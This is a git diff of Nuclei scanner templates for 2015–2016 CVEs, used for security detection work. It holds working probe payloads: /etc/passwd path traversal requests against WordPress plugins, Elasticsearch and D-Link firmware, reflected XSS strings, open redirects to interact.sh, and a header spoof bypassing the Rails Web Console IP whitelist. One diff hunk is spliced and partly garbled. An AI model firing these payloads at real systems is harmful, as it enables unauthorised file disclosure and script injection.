cpe:2.3:a:mdc_youtube_downloader_project:mdc_youtube_downloader:2.1.0:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: mdc_youtube_downloader_project + product: mdc_youtube_downloader + framework: wordpress + tags: cve2015,cve,wp,lfi,mdc_youtube_downloader_project,wordpress -requests: +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd" matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" @@ -32,5 +44,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/30 +# digest: 4a0a00473045022100ff5f92a49920cd8381ad88a3856050db835c74ab7946be53e0a1a413f0b190290220332d02cd0e4a2dd43ebccfbf82bba432e28fe572daf36a85f1ef7e36420aa6c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-5531.yaml b/nuclei-templates/CVE-2015/CVE-2015-5531.yaml index a67fffd436..de74ca8495 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-5531.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-5531.yaml @@ -7,11 +7,8 @@ info: reference: - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531 - https://nvd.nist.gov/vuln/detail/CVE-2015-5531 - - http://packetstormsecurity.com/files/132721/Elasticsearch-Directory-Traversal.html - - https://www.elastic.co/community/security/ - classification: - cve-id: CVE-2015-5531 tags: cve,cve2015,elasticsearch + requests: - raw: - | @@ -24,6 +21,7 @@ requests: "location": "/usr/share/elasticsearch/repo/test" } } + - | PUT /_snapshot/test2 HTTP/1.1 Host: {{Hostname}} @@ -34,9 +32,11 @@ requests: "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" } } + - | GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 Host: {{Hostname}} + matchers-condition: and matchers: - type: word @@ -46,6 +46,7 @@ requests: - 'Failed to derive xcontent from' - '114, 111, 111, 116, 58' condition: and + - type: status status: - 400 diff --git a/nuclei-templates/CVE-2015/cve-2015-5688.yaml b/nuclei-templates/CVE-2015/CVE-2015-5688.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-5688.yaml rename to nuclei-templates/CVE-2015/CVE-2015-5688.yaml diff --git a/nuclei-templates/CVE-2015/cve-2015-6477.yaml b/nuclei-templates/CVE-2015/CVE-2015-6477.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-6477.yaml rename to nuclei-templates/CVE-2015/CVE-2015-6477.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-6544.yaml b/nuclei-templates/CVE-2015/CVE-2015-6544.yaml deleted file mode 100644 index defac45d15..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-6544.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2015-6544 -info: - name: iTop XSS - author: pikpikcu - severity: medium - description: | - Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2015-6544 - - https://www.htbridge.com/advisory/HTB23268 - - http://sourceforge.net/p/itop/tickets/1114/ - - http://sourceforge.net/p/itop/code/3662/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2015-6544 - cwe-id: CWE-79 - tags: cve,cve2015,xss,itop -requests: - - method: GET - path: - - "{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - type: status - status: - - 200 - - type: word - part: header - words: - - text/html diff --git a/nuclei-templates/CVE-2015/CVE-2015-7245.yaml b/nuclei-templates/CVE-2015/CVE-2015-7245.yaml index d952de8e1f..4bb280a998 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-7245.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-7245.yaml @@ -6,18 +6,31 @@ info: severity: high description: | D-Link DVG-N5402SP is susceptible to local file inclusion in products with firmware W1000CN-00, W1000CN-03, or W2000EN-00. A remote attacker can read sensitive information via a .. (dot dot) in the errorpage parameter. + impact: | + An attacker can read sensitive files on the system, potentially leading to unauthorized access or disclosure of sensitive information. + remediation: | + Update the router firmware to the latest version, which includes a fix for the local file inclusion vulnerability. reference: - https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html - https://www.exploit-db.com/exploits/39409/ - https://nvd.nist.gov/vuln/detail/CVE-2015-7245 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-7245 cwe-id: CWE-22 - tags: cve,cve2015,dlink,lfi,packetstorm,edb + epss-score: 0.96881 + epss-percentile: 0.99685 + cpe: cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-00:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: d-link + product: dvg-n5402sp_firmware + tags: cve2015,cve,dlink,lfi,packetstorm,edb,d-link -requests: +http: - raw: - | POST /cgibin/webproc HTTP/1.1 @@ -30,5 +43,4 @@ requests: part: body regex: - "root:.*:0:0:" - -# Enhanced by mp on 2022/09/30 +# digest: 4a0a00473045022100d1aafb8c10f1a664ef200cb0b07719e65cca20f646b773edd9631bbd351283b102206cf94666854313f20d7360c569b2d3fa912b5887a16ae63b1dcf827a26d04341:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/cve-2015-7377.yaml b/nuclei-templates/CVE-2015/CVE-2015-7377.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-7377.yaml rename to nuclei-templates/CVE-2015/CVE-2015-7377.yaml diff --git a/nuclei-templates/CVE-2015/cve-2015-7823.yaml b/nuclei-templates/CVE-2015/CVE-2015-7823.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-7823.yaml rename to nuclei-templates/CVE-2015/CVE-2015-7823.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-9312.yaml b/nuclei-templates/CVE-2015/CVE-2015-9312.yaml index 6ecf35121f..72bff270c2 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-9312.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-9312.yaml @@ -6,19 +6,22 @@ info: severity: medium description: | WordPress NewStatPress plugin through 1.0.4 contains a cross-site scripting vulnerability. The plugin utilizes, on lines 28 and 31 of the file "includes/nsp_search.php", several variables from the $_GET scope without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to initiate a cross-site scripting attack. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 1.0.6 reference: - https://wpscan.com/vulnerability/46bf6c69-b612-4aee-965d-91f53f642054 - https://g0blin.co.uk/g0blin-00057/ - https://wordpress.org/plugins/newstatpress/#developers - https://nvd.nist.gov/vuln/detail/CVE-2015-9312 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2015-9312 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36245 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +29,7 @@ info: vendor: newstatpress_project product: newstatpress framework: wordpress - tags: cve2015,xss,authenticated,wp,newstatpress,wpscan,cve,wordpress,wp-plugin + tags: cve2015,cve,xss,authenticated,wp,newstatpress,wpscan,wordpress,wp-plugin,newstatpress_project http: - raw: @@ -47,4 +50,4 @@ http: - 'contains(body_2, "=5' + - 'duration>=7' - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "404-to-301")' condition: and -# digest: 4b0a00483046022100fe561eccf1babd7e46993dd38ffd9baed12d2115f59c4efc2ac192f76648d5c2022100a708bffdc7f0d5fbe3a73070ae2bcff2171ab0b6c5b85263aa5def6507b0da90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220323384f1c4a276c3079649349540d04cea85e2fe8ce4c73d852567ac9fc5ba7b02203375e2c826ab3ce90ed5672b210ae86d810e572690d581ff587260ceceebb4f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-9414.yaml b/nuclei-templates/CVE-2015/CVE-2015-9414.yaml index 176243919d..d65a7b2262 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-9414.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-9414.yaml @@ -1,34 +1,37 @@ id: CVE-2015-9414 + info: name: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - description: The wp-symposium plugin through 15.8.1 for WordPress has XSS via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter. reference: - https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095 - https://nvd.nist.gov/vuln/detail/CVE-2015-9414 - - https://wpvulndb.com/vulnerabilities/8175 - - https://wordpress.org/plugins/wp-symposium/#developers + tags: cve,cve2015,wordpress,wp-plugin,xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2015-9414 cwe-id: CWE-79 - tags: cve,cve2015,wordpress,wp-plugin,xss + description: "The wp-symposium plugin through 15.8.1 for WordPress has XSS via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter." + requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + matchers-condition: and matchers: - type: word words: - '' part: body + - type: word part: header words: - text/html + - type: status status: - 200 diff --git a/nuclei-templates/CVE-2015/cve-2015-9480.yaml b/nuclei-templates/CVE-2015/CVE-2015-9480.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-9480.yaml rename to nuclei-templates/CVE-2015/CVE-2015-9480.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-2166.yaml b/nuclei-templates/CVE-2015/cve-2015-2166.yaml similarity index 100% rename from nuclei-templates/CVE-2015/CVE-2015-2166.yaml rename to nuclei-templates/CVE-2015/cve-2015-2166.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-2807.yaml b/nuclei-templates/CVE-2015/cve-2015-2807.yaml similarity index 100% rename from nuclei-templates/CVE-2015/CVE-2015-2807.yaml rename to nuclei-templates/CVE-2015/cve-2015-2807.yaml diff --git a/nuclei-templates/CVE-2015/cve-2015-3224.yaml b/nuclei-templates/CVE-2015/cve-2015-3224.yaml new file mode 100644 index 0000000000..df6b263f83 --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-3224.yaml @@ -0,0 +1,57 @@ +id: CVE-2015-3224 + +info: + name: Ruby on Rails Web Console - Remote Code Execution + author: pdteam + severity: medium + description: Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb. + impact: | + Remote code execution can lead to unauthorized access, data breaches, and complete compromise of the affected system. + remediation: | + Upgrade to a patched version of Ruby on Rails or disable the Web Console feature. + reference: + - https://www.metahackers.pro/rails-web-console-v2-whitelist-bypass-code-exec/ + - https://www.jomar.fr/posts/2022/basic_recon_to_rce_ii/ + - https://hackerone.com/reports/44513 + - https://nvd.nist.gov/vuln/detail/CVE-2015-3224 + - http://lists.fedoraproject.org/pipermail/package-announce/2015-June/160881.html + classification: + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 + cve-id: CVE-2015-3224 + cwe-id: CWE-284 + epss-score: 0.92904 + epss-percentile: 0.98975 + cpe: cpe:2.3:a:rubyonrails:web_console:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: rubyonrails + product: web_console + tags: cve2015,cve,ruby,hackerone,rce,rails,intrusive,rubyonrails + +http: + - method: GET + path: + - "{{BaseURL}}/{{randstr}}" + + headers: + X-Forwarded-For: ::1 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Rails.root:" + - "Action Controller: Exception caught" + condition: and + + - type: word + part: response + words: + - X-Web-Console-Session-Id + - data-remote-path= + - data-session-id= + case-insensitive: true + condition: or +# digest: 4a0a00473045022100c4b2125a78ee523a116fd826ab60375b59dd4e7783faf87bb57fdb018ec7183702203cd169073ca993580b1ad5b798b29f12ea43ea85d77a1f8eb1fce8095e0a0b34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-3306.yaml b/nuclei-templates/CVE-2015/cve-2015-3306.yaml similarity index 100% rename from nuclei-templates/CVE-2015/CVE-2015-3306.yaml rename to nuclei-templates/CVE-2015/cve-2015-3306.yaml diff --git a/nuclei-templates/CVE-2015/cve-2015-4666.yaml b/nuclei-templates/CVE-2015/cve-2015-4666.yaml deleted file mode 100644 index 374b84c7b5..0000000000 --- a/nuclei-templates/CVE-2015/cve-2015-4666.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2015-4666 - -info: - name: Xceedium Xsuite <=2.4.4.5 - Local File Inclusion - author: 0x_Akoko - severity: high - description: Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter. - reference: - - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt - - http://packetstormsecurity.com/files/132809/Xceedium-Xsuite-Command-Injection-XSS-Traversal-Escalation.html - - https://nvd.nist.gov/vuln/detail/CVE-2015-4666 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2015-4666 - cwe-id: CWE-22 - tags: xceedium,xsuite,lfi,packetstorm,cve,cve2015 - -requests: - - method: GET - path: - - "{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/13 diff --git a/nuclei-templates/CVE-2015/cve-2015-4668.yaml b/nuclei-templates/CVE-2015/cve-2015-4668.yaml new file mode 100644 index 0000000000..cb04dbfe5c --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-4668.yaml @@ -0,0 +1,43 @@ +id: CVE-2015-4668 + +info: + name: Xsuite <=2.4.4.5 - Open Redirect + author: 0x_Akoko + severity: medium + description: | + Xsuite 2.4.4.5 and prior contains an open redirect vulnerability, which can allow a remote attacker to redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the redirurl parameter. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. + remediation: | + Upgrade Xsuite to a version higher than 2.4.4.5 to mitigate the open redirect vulnerability. + reference: + - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt + - https://vuldb.com/?id.107082 + - https://www.exploit-db.com/exploits/37708/ + - https://nvd.nist.gov/vuln/detail/CVE-2015-4668 + - https://support.ca.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2015-4668 + cwe-id: CWE-601 + epss-score: 0.00397 + epss-percentile: 0.73024 + cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: xceedium + product: xsuite + tags: cve2015,cve,redirect,xsuite,xceedium,edb + +http: + - method: GET + path: + - '{{BaseURL}}/openwin.php?redirurl=http://interact.sh' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4b0a004830460221009ee0f100e63fe1fb1f2fce30cefa8ea106fd61cde30ad3bbfe3ca713cc92dec602210098683f371b4cedc1c1d7f39a8a6aba9b813b585294104980333339b5e76ce0a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/cve-2015-5354.yaml b/nuclei-templates/CVE-2015/cve-2015-5354.yaml new file mode 100644 index 0000000000..387ce0d925 --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-5354.yaml @@ -0,0 +1,42 @@ +id: CVE-2015-5354 + +info: + name: Novius OS 5.0.1-elche - Open Redirect + author: 0x_Akoko + severity: medium + description: Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. + remediation: | + Apply the latest security patches or upgrade to a newer version of Novius OS. + reference: + - https://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html + - https://vuldb.com/?id.76181 + - http://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html + - https://nvd.nist.gov/vul n/detail/CVE-2015-5354 + - https://www.exploit-db.com/exploits/37439/ + classification: + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-score: 5.8 + cve-id: CVE-2015-5354 + cwe-id: CWE-601 + epss-score: 0.00166 + epss-percentile: 0.53247 + cpe: cpe:2.3:a:novius-os:novius_os:5.0.1:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: novius-os + product: novius_os + tags: cve2015,cve,packetstorm,redirect,novius,novius-os,xss + +http: + - method: GET + path: + - '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4a0a0047304502201fa0d9d2f70b020f889d8f45ac1c39f17dc563a71461963cc4c57b569f70d096022100ef358f446f62fcfbf11e15fb21855a3061d1f1cd2c38509a6fa7fc32a0256bf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/cve-2015-6544.yaml b/nuclei-templates/CVE-2015/cve-2015-6544.yaml new file mode 100644 index 0000000000..23b0e18646 --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-6544.yaml @@ -0,0 +1,36 @@ +id: CVE-2015-6544 + +info: + name: iTop XSS + author: pikpikcu + severity: medium + description: | + Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title. + reference: https://nvd.nist.gov/vuln/detail/CVE-2015-6544 + tags: cve,cve2015,xss,itop + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2015-6544 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html diff --git a/nuclei-templates/CVE-2015/CVE-2015-7450.yaml b/nuclei-templates/CVE-2015/cve-2015-7450.yaml similarity index 100% rename from nuclei-templates/CVE-2015/CVE-2015-7450.yaml rename to nuclei-templates/CVE-2015/cve-2015-7450.yaml diff --git a/nuclei-templates/CVE-2015/cve-2015-8399.yaml b/nuclei-templates/CVE-2015/cve-2015-8399.yaml index d4ae3f22f5..55ff02a7c7 100644 --- a/nuclei-templates/CVE-2015/cve-2015-8399.yaml +++ b/nuclei-templates/CVE-2015/cve-2015-8399.yaml @@ -1,4 +1,4 @@ -id: cve-2015-8399 +id: CVE-2015-8399 info: author: princechaddha name: Atlassian Confluence configuration files read @@ -6,6 +6,12 @@ info: description: Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action. reference: https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro tags: cve,cve2015,atlassian,confluence + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.30 + cve-id: CVE-2015-8399 + cwe-id: CWE-200 + requests: - method: GET path: @@ -15,6 +21,7 @@ requests: - type: status status: - 200 + - type: word words: - "confluence-init.properties" diff --git a/nuclei-templates/CVE-2016/cve-2016-1000126.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000126.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000126.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000126.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-1000127.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000127.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000127.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000127.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-1000128.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000128.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000128.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000128.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000133.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000133.yaml deleted file mode 100644 index 10593e41a6..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000133.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2016-1000133 -info: - name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 - - https://wordpress.org/plugins/forget-about-shortcode-buttons - - http://www.vapidlabs.com/wp/wp_advisory.php?v=602 - - http://www.securityfocus.com/bid/93869 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000133 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000134.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000134.yaml deleted file mode 100644 index 608daf2d21..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000134.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2016-1000134 -info: - name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via playlist.php - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin hdw-tube v1.2 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 - - http://www.vapidlabs.com/wp/wp_advisory.php?v=530 - - https://wordpress.org/plugins/hdw-tube - - http://www.securityfocus.com/bid/93868 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000134 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000135.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000135.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000135.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000135.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-1000138.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000138.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000138.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000138.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000141.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000141.yaml deleted file mode 100644 index 635ff46c5f..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000141.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2016-1000141 - -info: - name: WordPress Page Layout builder v1.9.3 - Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: WordPress plugin Page-layout-builder v1.9.3 contains a cross-site scripting vulnerability. - remediation: Upgrade to version 2.0 or higher. - reference: - - http://www.vapidlabs.com/wp/wp_advisory.php?v=358 - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000141 - tags: cve,cve2016,wordpress,xss,wp-plugin - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2016-1000141 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/24 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000142.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000142.yaml deleted file mode 100644 index e25d5ac539..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000142.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2016-1000142 -info: - name: MW Font Changer <= 4.2.5 - Unauthenticated Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: The MW Font Changer WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability. - reference: - - https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000142 - - http://www.vapidlabs.com/wp/wp_advisory.php?v=435 - - https://wordpress.org/plugins/parsi-font - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000142 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,wp-plugin,xss -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000148.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000148.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000148.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000148.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-1000149.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000149.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000149.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000149.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-10033.yaml b/nuclei-templates/CVE-2016/CVE-2016-10033.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-10033.yaml rename to nuclei-templates/CVE-2016/CVE-2016-10033.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-10108.yaml b/nuclei-templates/CVE-2016/CVE-2016-10108.yaml index dcb9be0b22..8c3a189e04 100644 --- a/nuclei-templates/CVE-2016/CVE-2016-10108.yaml +++ b/nuclei-templates/CVE-2016/CVE-2016-10108.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Unauthenticated Remote Command injection as root occurs in the Western Digital MyCloud NAS 2.11.142 /web/google_analytics.php URL via a modified arg parameter in the POST data. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data loss, and potential compromise of the entire network. remediation: | Apply the latest firmware update provided by Western Digital to patch the 